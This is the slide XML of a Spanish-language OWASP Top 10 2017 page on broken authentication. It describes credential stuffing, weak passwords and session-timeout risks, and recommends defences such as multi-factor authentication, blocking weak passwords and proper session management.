                        <a:t>El impacto al negocio depende de las necesidades de la aplicación y de los datos.</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Ejemplos de escenarios de ataque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>relleno automático de credenciales</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>uso de listas de contraseñas conocidas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> son ataques comunes. Si una aplicación no implementa protecciones automáticas, podrían utilizarse para determinar si las credenciales son válidas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>la mayoría de los ataques de autenticación ocurren debido al uso de contraseñas como único factor. Las mejores prácticas requieren la rotación y complejidad de las contraseñas y desalientan el uso de claves débiles por parte de los usuarios. Se recomienda a las organizaciones utilizar las prácticas recomendadas en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Guía NIST 800-63 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y el uso de autenticación multi-factor (2FA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> los tiempos de vida de las sesiones de aplicación no están configurados correctamente. Un usuario utiliza una computadora pública para acceder a una aplicación. En lugar de seleccionar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“logout”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, el usuario simplemente cierra la pestaña del navegador y se aleja. Un atacante usa el mismo navegador una hora más tarde, la sesión continúa activa y el usuario se encuentra autenticado.</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¿La aplicación es vulnerable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La confirmación de la identidad y la gestión de sesiones del usuario son fundamentales para protegerse contra ataques relacionados con la autenticación.</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="880" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pueden existir debilidades de autenticación si la aplicación:</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Permite ataques automatizados como la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>reutilización de credenciales conocidas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, cuando el atacante ya posee una lista de pares de usuario y contraseña válidos.</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Permite ataques de fuerza bruta y/o ataques automatizados.</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Permite contraseñas por defecto, débiles o muy conocidas, como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“Password1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“Contraseña1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“admin/admin”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="88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Posee procesos débiles o inefectivos en el proceso de  recuperación de credenciales, como “respuestas basadas en el conocimiento”, las cuales no se pueden implementar de forma segura.</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Almacena las contraseñas en texto claro o cifradas con métodos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> débiles (vea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Exposición de Datos Sensibles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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No posee autenticación multi-factor o fue implementada de forma ineficaz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Expone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Session IDs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>en las URL, no la invalida correctamente o no la rota satisfactoriamente luego del cierre de sesión o de un periodo de tiempo determinado.</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Referencias</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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0"/>
              </a:rPr>
              <a:t>V3 Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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2"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Cheat Sheet: Credential Stuffing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Forgot Password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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OWASP Cheat Sheet: Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId17"/>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OWASP Automated Threats Handbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId17"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId18"/>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1"/>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s-AR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cómo se previene</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Implemente autenticación multi-factor para evitar ataques automatizados, de fuerza bruta o reúso de credenciales robadas.</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No utilice credenciales por defecto en su software, particularmente en el caso de administradores. </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Implemente controles contra contraseñas débiles. Cuando el usuario ingrese una nueva clave, la misma puede verificarse contra la lista del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Top 10.000 de peores contraseñas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Alinear la política de longitud, complejidad y rotación de contraseñas con las recomendaciones de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Sección 5.1.1 para Secretos Memorizados de la Guía NIST 800-63 B's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> u otras políticas de contraseñas modernas, basadas en evidencias.</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Mediante la utilización de los mensajes genéricos iguales en todas las salidas, asegúrese que el registro, la recuperación de credenciales y el uso de APIs, no permiten ataques de enumeración de usuarios.</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Limite o incremente el tiempo de respuesta de cada intento fallido de inicio de sesión. Registre todos los fallos y avise a los administradores cuando se detecten ataques de fuerza bruta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Utilice un gestor de sesión en el servidor, integrado, seguro y que genere un nuevo ID de sesión aleatorio con alta entropía después del inicio de sesión. El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Session-ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> no debe incluirse en la URL, debe almacenarse de forma segura y ser invalidado después del cierre de sesión o de un tiempo de inactividad determinado por la criticidad del negocio.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="840"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s-AR" sz="4000" noProof="0" dirty="0"/>
              <a:t>A2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="2000" noProof="0" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>Pérdida de Autenticación</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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40649042"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="2246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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Explotabilidad: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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s-419" sz="900" b="1" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad: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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Técnico: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es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los atacantes tienen acceso a millones de combinaciones de pares de usuario y contraseña conocidas (debido a fugas de información), además de cuentas administrativas por defecto. Pueden realizar ataques mediante herramientas de fuerza bruta o diccionarios para romper los </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>hashes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> de las contraseñas.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es-AR" sz="900" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los errores de pérdida de autenticación</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> son comunes debido al diseño y la implementación de la mayoría de los controles de acceso. La gestión de sesiones es la piedra angular de los controles de autenticación y está presente en las aplicaciones.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los atacantes pueden detectar la autenticación defectuosa utilizando medios manuales y explotarlos utilizando herramientas automatizadas con listas de contraseñas y ataques de diccionario.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">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s-AR" sz="900" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los atacantes solo tienen que obtener el acceso a unas pocas cuentas o a una cuenta de administrador para comprometer el sistema. Dependiendo del dominio de la aplicación, esto puedo permitir robo de identidad, lavado de dinero y la divulgación de información sensible protegida legalmente.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0">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2471</TotalTime>
  <Words>15769</Words>
